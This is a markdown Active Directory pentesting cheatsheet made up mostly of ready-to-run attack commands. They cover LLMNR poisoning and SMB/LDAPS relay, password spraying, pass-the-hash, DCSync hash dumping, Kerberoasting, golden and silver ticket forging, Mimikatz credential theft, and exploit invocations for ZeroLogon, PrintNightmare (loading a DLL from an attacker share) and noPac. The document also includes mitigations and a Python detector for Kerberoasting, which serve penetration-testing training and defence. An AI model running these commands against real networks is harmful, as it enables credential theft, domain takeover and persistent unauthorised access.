security-cheatsheets/infosec/active-directory.md

Active Directory Pentesting Cheatsheet

Quick reference for Active Directory enumeration, attacks, and post-exploitation.


AD Overview

Key Components

| Component | Description |
|---|---|
| Domain Controller (DC) | Central AD server; holds NTDS.dit and runs the KDC |
| NTDS.dit | AD database with every user and machine account hash |
| SYSVOL | Domain-wide share with GPOs and logon scripts |
| Kerberos | Primary authentication protocol (TCP/UDP 88) |
| LDAP | Directory query protocol (389, 636 over TLS) |

Common Ports

| Port | Service |
|---|---|
| 53 | DNS |
| 88 | Kerberos |
| 135 | RPC endpoint mapper |
| 139 | NetBIOS session |
| 389 | LDAP |
| 445 | SMB |
| 464 | Kerberos password change |
| 636 | LDAPS |
| 3268 / 3269 | Global Catalog (LDAP / LDAPS) |
| 3389 | RDP |
| 5985 / 5986 | WinRM (HTTP / HTTPS), used by Evil-WinRM |

Initial Attack Vectors

LLMNR/NBT-NS Poisoning

Concept: When a name does not resolve in DNS, Windows falls back to LLMNR and NBT-NS broadcasts. Answering those broadcasts makes the victim authenticate to the attacker, which yields a NetNTLMv2 challenge-response that can be cracked offline or relayed.

# Start Responder (poison LLMNR/NBT-NS/mDNS, serve WPAD, verbose)
sudo responder -I eth0 -wv
# Older guides use `responder -I eth0 -rdwv`; in Responder 3.1+ -r no longer exists and
# -d starts the DHCP poisoner instead, so check `responder -h` for the installed version

# Wait for authentication attempts...
# Captured line is a NetNTLMv2 challenge-response, not a reusable hash:
#   user::DOMAIN:server_challenge:NTProofStr:blob
# It can be cracked offline or relayed, but it cannot be passed like an NT hash

# Crack with hashcat (mode 5600 = NetNTLMv2)
hashcat -m 5600 hash.txt rockyou.txt

Mitigation: Disable LLMNR via GPO and NBT-NS on each adapter (no native GPO for NBT-NS; push it with a DHCP scope option or a startup script), turn off WPAD auto-detection, and require SMB signing so a captured authentication cannot be relayed.


SMB Relay

Concept: Instead of capturing the NTLM authentication, forward it live to another host. This only works against targets that do not require SMB signing (workstations and member servers by default; DCs require it) and is most useful when the relayed user is a local admin on the target.

# 1. Find hosts where SMB signing is not required and write them to targets.txt
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt

# 2. Configure Responder so it still poisons but does not answer SMB/HTTP itself
#    (ntlmrelayx will listen on 445/80 instead)
# Edit /etc/responder/Responder.conf
# SMB = Off
# HTTP = Off

# 3. Start ntlmrelayx (default action: dump the local SAM of every target the relayed user is admin on)
impacket-ntlmrelayx -tf targets.txt -smb2support

# 4. Start Responder
responder -I eth0 -wv

# For an interactive SMB shell on the relayed session:
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# ntlmrelayx prints "Started interactive SMB client shell via TCP on 127.0.0.1:11000";
# connect with nc 127.0.0.1 11000 (the port increments for each new session)

IPv6 DNS Takeover

# mitm6 answers DHCPv6 and becomes the victims' DNS server (Windows prefers IPv6 DNS over IPv4)
sudo mitm6 -d domain.local

# Relay the resulting WPAD/NTLM authentication to LDAPS on the DC; domain dump lands in ./loot
impacket-ntlmrelayx -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot

Mitigation: If IPv6 is unused, block DHCPv6 and router advertisements at the host firewall; disable WPAD; enable LDAP signing and channel binding so the relay to LDAP/LDAPS fails.

Post-Compromise Enumeration

Domain Information

# From Windows
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
# PowerView
. .\PowerView.ps1
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainGroup
Get-DomainComputer

BloodHound

# Install (legacy BloodHound 4.x from the Kali repos; BloodHound CE is distributed as a docker compose stack instead)
sudo apt install bloodhound neo4j

# Start neo4j
sudo neo4j console
# Navigate to http://localhost:7474, login neo4j:neo4j, change password

# Start BloodHound
bloodhound
# Collect data with SharpHound
powershell -ep bypass
. .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFileName output.zip
# Or use bloodhound-python from Linux
bloodhound-python -u user -p 'password' -d domain.local -ns <DC-IP> -c all

Key Queries:

  • "Find Shortest Paths to Domain Admins"
  • "Find Principals with DCSync Rights"
  • "List all Kerberoastable Accounts"

Credential Attacks

Pass the Password

# Test one credential across the network (one user, many hosts; not a spray against many users)
crackmapexec smb 192.168.1.0/24 -u username -d DOMAIN -p 'Password123'

# Spray one password against a user list; mind the lockout threshold before running this
crackmapexec smb 192.168.1.100 -u users.txt -d DOMAIN -p 'Password123' --continue-on-success

# Check specific hosts
crackmapexec smb 192.168.1.100 -u username -d DOMAIN -p 'Password123'

# Execute command
crackmapexec smb 192.168.1.100 -u user -d DOMAIN -p 'pass' -x 'whoami'

# Get shell with psexec
impacket-psexec DOMAIN/user:'password'@192.168.1.100

Pass the Hash

Note: Pass-the-hash needs the NT hash (from SAM, LSASS or NTDS.dit). NetNTLMv1/v2 challenge-responses captured by Responder cannot be passed, only cracked or relayed.

# With CrackMapExec: local SAM account (e.g. a local Administrator hash reused across hosts)
crackmapexec smb 192.168.1.0/24 -u user -H <NTLM_hash> --local-auth
# Domain account
crackmapexec smb 192.168.1.0/24 -u user -d DOMAIN -H <NTLM_hash>

# Get shell
impacket-psexec user@192.168.1.100 -hashes <LM:NTLM>
impacket-wmiexec user@192.168.1.100 -hashes <LM:NTLM>

# Example: aad3b435b51404eeaad3b435b51404ee is the "no LM hash" constant; the NT half shown is the hash of an empty password (illustration only)
impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

Dumping Hashes

# With credentials
impacket-secretsdump DOMAIN/user:'password'@192.168.1.100

# With hash
impacket-secretsdump user@192.168.1.100 -hashes <LM:NTLM>

# From DC (DCSync)
impacket-secretsdump DOMAIN/admin:'password'@DC-IP -just-dc-ntlm

Cracking Hashes

# NTLM hashes
hashcat -m 1000 ntlm_hashes.txt rockyou.txt

# NTLMv2 hashes (from Responder)
hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt

# Kerberos TGS-REP (Kerberoasting), RC4 etype 23 ($krb5tgs$23$)
hashcat -m 13100 tgs_hashes.txt rockyou.txt
# AES etype 17/18 TGS-REP ($krb5tgs$17$ / $krb5tgs$18$) are modes 19600 / 19700 and crack far slower

# Kerberos AS-REP (AS-REP Roasting), RC4 etype 23 ($krb5asrep$23$)
hashcat -m 18200 asrep_hashes.txt rockyou.txt
# AES etype 17/18 AS-REP are modes 19800 / 19900

Kerberos Attacks

Kerberoasting

Concept: Any authenticated domain user can request a service ticket (TGS) for any SPN. The ticket is encrypted with the service account's key, so it can be cracked offline to recover that account's password.

# Get TGS tickets (writes hashcat-ready lines to tgs_hash.txt)
impacket-GetUserSPNs DOMAIN/user:password -dc-ip <DC-IP> -request -outputfile tgs_hash.txt

# Crack (RC4 tickets start with $krb5tgs$23$; AES ones need modes 19600/19700 and crack far slower)
hashcat -m 13100 tgs_hash.txt rockyou.txt
# From Windows with Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt

Mitigation: Long random service account passwords (25+ characters), group Managed Service Accounts (gMSA), AES-only service accounts (msDS-SupportedEncryptionTypes), and alerting on 4769 events with RC4 (0x17) encryption from one user across many SPNs.
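A detection-side check for the Kerberoasting mitigation above, written as an added Python example (not part of this cheatsheet and not a vendor rule): a sliding-window rule over 4769 (service ticket requested) events that fires when one user from one source IP obtains several distinct RC4 (TicketEncryptionType 0x17) service tickets within a few minutes, which is the footprint `GetUserSPNs -request` and `Rubeus kerberoast` leave on the DC. The flattened `timestamp key=value` log lines, the users, SPNs and IPs are all constructed for the example; on a real DC the same fields come from the EventData of the 4769 XML.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Dict, List

RC4_HMAC = 0x17           # TicketEncryptionType that roasting tools request by default
AES_TYPES = {0x11, 0x12}  # aes128 / aes256-cts-hmac-sha1-96: what AES-only accounts hand out

# Constructed sample of flattened 4769 events (timestamp, then key=value pairs); not real DC logs.
SAMPLE_LOG = """
2024-05-01T09:12:01 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:12:02 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:12:02 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:12:03 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:12:04 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_ftp TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:13:30 EventID=4769 TargetUserName=jdoe@CORP.LOCAL ServiceName=svc_print TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.50
2024-05-01T09:12:10 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.61
2024-05-01T09:12:11 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.61
2024-05-01T09:12:12 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.61
2024-05-01T09:12:13 EventID=4769 TargetUserName=asmith@CORP.LOCAL ServiceName=svc_ftp TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.61
2024-05-01T09:15:00 EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.77
2024-05-01T09:15:01 EventID=4768 TargetUserName=bob ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.77
"""


def parse_event(line: str) -> dict:
    """Turn one flattened line into a dict with typed TimeCreated, EventID and TicketEncryptionType."""
    ts, _, rest = line.strip().partition(" ")
    ev = {"TimeCreated": datetime.fromisoformat(ts)}
    for field in rest.split():
        key, _, value = field.partition("=")
        ev[key] = value
    ev["EventID"] = int(ev["EventID"])
    ev["TicketEncryptionType"] = int(ev["TicketEncryptionType"], 16)
    return ev


def is_roast_candidate(ev: dict) -> bool:
    """Successfully issued RC4 service ticket for a user (not machine) service account."""
    svc = str(ev.get("ServiceName", ""))
    return (ev.get("EventID") == 4769
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and ev.get("Status") == "0x0"
            and not svc.endswith("$")              # machine accounts: random 120-char passwords, not crackable
            and svc.lower() != "krbtgt")


def detect_kerberoasting(events, threshold: int = 4, window: timedelta = timedelta(minutes=5)) -> List[dict]:
    """Alert when one (user, source IP) obtains >= threshold distinct RC4 service tickets inside the window."""
    candidates = sorted((e for e in events if is_roast_candidate(e)), key=lambda e: e["TimeCreated"])
    recent = defaultdict(deque)           # per requester, events still inside the sliding window
    alerts: Dict[tuple, dict] = {}
    for ev in candidates:
        key = (ev["TargetUserName"], ev["IpAddress"])
        q = recent[key]
        q.append(ev)
        while ev["TimeCreated"] - q[0]["TimeCreated"] > window:
            q.popleft()
        services = sorted({e["ServiceName"] for e in q})
        if len(services) >= threshold:
            alert = alerts.setdefault(key, {"user": key[0], "source_ip": key[1], "first_seen": q[0]["TimeCreated"]})
            alert["services"] = services          # keep growing the list while the burst continues
            alert["last_seen"] = ev["TimeCreated"]
    return list(alerts.values())


def run_sample() -> List[dict]:
    return detect_kerberoasting(parse_event(l) for l in SAMPLE_LOG.strip().splitlines())


if __name__ == "__main__":
    for a in run_sample():
        print(f"{a['user']} from {a['source_ip']}: {len(a['services'])} RC4 TGS in "
              f"{a['last_seen'] - a['first_seen']} -> {', '.join(a['services'])}")
```

Tune `threshold` and `window` to the environment (monitoring agents and some SSO products request many tickets legitimately), and expect the rule to go quiet once service accounts are AES-only: `asmith` in the sample is the benign shape, and with `msDS-SupportedEncryptionTypes` set to AES the RC4 requests either fail or show up as 0x12, so the remaining 0x17 tickets become the interesting ones.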


AS-REP Roasting

Concept: Accounts with "Do not require Kerberos preauthentication" (userAccountControl bit 0x400000) get an AS-REP encrypted with their own key handed to anyone who asks, so no password is needed to obtain something crackable offline.

# Find vulnerable accounts and get hashes (no credentials: needs a list of usernames to try)
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip <DC-IP> -format hashcat -outputfile asrep_hash.txt
# With credentials, LDAP finds the accounts for you
impacket-GetNPUsers DOMAIN/user:password -dc-ip <DC-IP> -request -format hashcat -outputfile asrep_hash.txt

# Crack
hashcat -m 18200 asrep_hash.txt rockyou.txt

Golden Ticket

Concept: Forge a TGT with the krbtgt account's hash for persistent access as any user. It survives every other password change and only stops working once krbtgt has been rotated twice (the KDC still accepts the previous key).

# Get krbtgt hash (needs DA or DCSync rights)
impacket-secretsdump DOMAIN/admin:password@DC-IP -just-dc-user krbtgt
# Domain SID: the prefix of any domain account SID (everything before the final RID)
impacket-lookupsid DOMAIN/user:password@DC-IP

# Create golden ticket (use the FQDN; DCs with the Nov 2021 PAC hardening check that the ticket's RID
# matches the user, hence -user-id 500 for Administrator)
impacket-ticketer -nthash <krbtgt_hash> -domain-sid <domain_sid> -domain domain.local -user-id 500 administrator

# Use ticket: Kerberos needs the target's hostname (add it to /etc/hosts) and a clock within 5 minutes of the DC
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@target.domain.local -k -no-pass

Silver Ticket

Concept: Forge a service ticket (TGS) for one SPN with the key of the account that runs the service (for CIFS/HOST that is the target's machine account). The DC is never contacted, so nothing is logged there; machine account keys rotate every 30 days, so the ticket dies with them.

# Create silver ticket for CIFS (file shares); use the FQDN as the domain
impacket-ticketer -nthash <service_hash> -domain-sid <domain_sid> -domain domain.local -spn CIFS/target.domain.local user

export KRB5CCNAME=user.ccache
# impacket-smbclient takes [domain/]user@host (not //host/share); list and open shares from its prompt with `shares` and `use <share>`
impacket-smbclient domain.local/user@target.domain.local -k -no-pass

Token Impersonation

# Incognito (Meterpreter)
load incognito
list_tokens -u
impersonate_token "DOMAIN\\Administrator"

# With Mimikatz
privilege::debug
token::elevate

Mimikatz

# Dump credentials
privilege::debug
sekurlsa::logonpasswords

# DCSync attack
lsadump::dcsync /domain:domain.local /user:Administrator

# Pass the hash (spawns cmd.exe with the injected NT hash; change /run for another program)
sekurlsa::pth /user:admin /domain:domain.local /ntlm:<hash> /run:cmd.exe

# Golden ticket
kerberos::golden /user:Administrator /domain:domain.local /sid:<domain_sid> /krbtgt:<hash> /ptt

# Dump SAM
lsadump::sam

Lateral Movement

PsExec

impacket-psexec DOMAIN/user:password@target
impacket-psexec user@target -hashes <LM:NTLM>

WMIExec

impacket-wmiexec DOMAIN/user:password@target

Evil-WinRM

evil-winrm -i target -u user -p password
evil-winrm -i target -u user -H <NTLM_hash>

SMBExec

impacket-smbexec DOMAIN/user:password@target

Known Vulnerabilities

ZeroLogon (CVE-2020-1472)

# Test (reports vulnerable/not vulnerable without changing anything)
python3 zerologon_tester.py DC-NAME DC-IP

# Exploit: sets the DC's machine account password to empty in AD.
# This breaks the DC's own trust with the domain until it is restored; never run it without a restore plan.
python3 cve-2020-1472-exploit.py DC-NAME DC-IP

# Dump hashes using the now-empty machine account password
impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP

# Restore before leaving: pull the original machine password (plain_password_hex of $MACHINE.ACC from a
# secretsdump of the DC's LSA secrets with the admin creds you now have) and put it back with the
# restorepassword.py that ships with the exploit repository

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

# Check whether the spooler RPC interfaces are exposed
impacket-rpcdump @DC-IP | grep -E 'MS-RPRN|MS-PAR'

# Host the payload DLL on an anonymous share the DC can reach
impacket-smbserver share ./ -smb2support

# Exploit (the DLL is loaded by the spooler as SYSTEM on the target)
python3 CVE-2021-1675.py DOMAIN/user:password@DC-IP '\\attacker-ip\share\evil.dll'

noPac (CVE-2021-42278 / CVE-2021-42287)

# Scanner (any low-privileged domain account)
python3 scanner.py DOMAIN/user:password -dc-ip DC-IP

# Exploit: creates a machine account, renames its sAMAccountName to the DC's name without the trailing $,
# requests a TGT, renames it back, then uses S4U2self to get a service ticket to the DC as a DA.
# Needs ms-DS-MachineAccountQuota > 0 (default 10) and an unpatched DC.
python3 noPac.py DOMAIN/user:password -dc-ip DC-IP -shell

Useful Tools

| Tool | Purpose |
|---|---|
| CrackMapExec | Swiss army knife for AD (now continued as NetExec, `nxc`, with the same syntax) |
| Impacket | Python AD tools suite (psexec, secretsdump, ntlmrelayx, GetUserSPNs, ticketer ...) |
| BloodHound | AD attack path visualization |
| Mimikatz | Credential extraction |
| Rubeus | Kerberos abuse |
| PowerView | PowerShell AD recon |
| Evil-WinRM | WinRM shell |
| Responder | LLMNR/NBT-NS/mDNS poisoning |
| kerbrute | Kerberos user enumeration and brute forcing |

Attack Flow

1. LLMNR/NBT-NS Poisoning
   ↓
2. Crack hashes / Relay attacks
   ↓
3. Enumerate with BloodHound
   ↓
4. Kerberoast service accounts
   ↓
5. Lateral movement (Pass the Hash/Password)
   ↓
6. Find path to Domain Admin
   ↓
7. DCSync for all hashes
   ↓
8. Golden Ticket for persistence

Resources